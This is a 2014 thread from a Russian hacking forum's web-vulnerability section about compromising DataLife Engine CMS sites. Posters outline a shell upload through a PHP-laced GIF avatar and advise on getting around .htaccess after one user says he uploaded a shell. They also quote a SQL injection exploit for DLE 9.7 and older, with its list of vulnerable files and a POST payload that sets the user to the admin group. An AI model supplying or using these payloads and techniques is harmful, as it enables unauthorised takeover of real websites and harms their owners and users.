HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.02.2014, 21:50
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от b3  
Исполнение кода в аве через ajax? Вы про эту?
она самая
 
Ответить с цитированием

  #2  
Старый 08.02.2014, 00:02
hpol
Познающий
Регистрация: 11.12.2013
Сообщений: 62
Провел на форуме:
21252

Репутация: 15
По умолчанию

1. Php код встраивается в гифку и заливается в качестве аватарки.

2. В личных сообщения (а може где еще прокатит) вставляется код (не скажу есесно какой ) и сообщение отправляется. Для работоспособности должны быть разрешены теги картинок.

3. При прочтении сообщения запустится шелл.

с серча
 
Ответить с цитированием

  #3  
Старый 08.02.2014, 18:04
lansia
Участник форума
Регистрация: 06.02.2011
Сообщений: 111
Провел на форуме:
42267

Репутация: 5
По умолчанию

Цитата:
Сообщение от hpol  
1. Php код встраивается в гифку и заливается в качестве аватарки.
2. В личных сообщения (а може где еще прокатит) вставляется код (не скажу есесно какой ) и сообщение отправляется. Для работоспособности должны быть разрешены теги картинок.
3. При прочтении сообщения запустится шелл.
с серча
А как залить гифку с кодом php через аватар?Пишет что невозможно залить (debug mode).Проверил много Dle , не льется.
 
Ответить с цитированием

  #4  
Старый 11.02.2014, 18:29
mr.Arec
Новичок
Регистрация: 18.04.2013
Сообщений: 6
Провел на форуме:
1334

Репутация: 0
По умолчанию

Кто может помочь с удалением .htaccess в DLE 10.1

есть доступ в админку, залил шелл но не срабатывает из-за .htaccess
 
Ответить с цитированием

  #5  
Старый 11.02.2014, 19:05
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от mr.Arec  
Кто может помочь с удалением .htaccess в DLE 10.1
есть доступ в админку, залил шелл но не срабатывает из-за .htaccess
а как же вы его залили? через загрузку файлов?
 
Ответить с цитированием

  #6  
Старый 12.02.2014, 04:17
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Цитата:
Сообщение от mr.Arec  
Кто может помочь с удалением .htaccess в DLE 10.1
есть доступ в админку, залил шелл но не срабатывает из-за .htaccess
здесь вопрос простой: если сервер работает на голом апач и права на файл .htaccess 444, ничего не выйдет. Нужен или фтп, или "сосед" или заливка туда, где нет запрета на пхп (нет хтаксс)

а вот, например, апач + мод_реврайт (как многие любят, типы быстро), группа вэб имеет права по умолчанию на запись в диры и файлы. потому и убить его можно, методами описанными выше (или через /inc/files.php (вопрос версии) или через анимашку)
 
Ответить с цитированием

  #7  
Старый 13.02.2014, 18:11
mr.Arec
Новичок
Регистрация: 18.04.2013
Сообщений: 6
Провел на форуме:
1334

Репутация: 0
По умолчанию

Цитата:
Сообщение от chekist  
а как же вы его залили? через загрузку файлов?
через сторонний модуль
 
Ответить с цитированием

  #8  
Старый 13.02.2014, 23:12
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

slva2000 с версии 9.7 уже не робит

mr.Arec чё за модуль?
 
Ответить с цитированием

  #9  
Старый 17.02.2014, 20:47
FreddieVR
Новичок
Регистрация: 13.01.2014
Сообщений: 4
Провел на форуме:
1511

Репутация: 0
По умолчанию

Цитата:
Сообщение от SecondLife  
SQL injection 0day и получение админки для 9.7 и младше
Requirements:
Код:
user account
register_globals on
magic_quotes_gpc off
Файл - максимальная версия скрипта
Код:
/engine/ajax/adminfunction.php			9.6
/engine/ajax/allvotes.php			9.7
/engine/ajax/antivirus.php			9.7
/engine/ajax/clean.php				9.7
/engine/ajax/complaint.php			9.6
/engine/ajax/deletecomments.php			9.7
/engine/ajax/find_relates.php			9.7
/engine/ajax/message.php			9.7
/engine/ajax/newsletter.php			9.7
/engine/ajax/pm.php				9.7
/engine/ajax/poll.php				9.7
/engine/ajax/rebuild.php			9.7
/engine/ajax/rss.php				9.7
/engine/ajax/search.php				9.7
/engine/ajax/sitemap.php			9.7
/engine/ajax/templates.php			9.7
/engine/ajax/typograf.php			9.7
/engine/ajax/upload.php				9.7
/engine/ajax/vote.php				9.7
Request
Код:
POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit
PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set hash='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$hash[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', lastdate='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_TIME[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]', logged_ip='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' WHERE user_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR] 
(c) SecondLife
Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.
 
Ответить с цитированием

  #10  
Старый 18.02.2014, 18:37
gas896
Новичок
Регистрация: 29.01.2014
Сообщений: 12
Провел на форуме:
2175

Репутация: 0
По умолчанию

Цитата:
Сообщение от FreddieVR  
Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.
Как юзать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.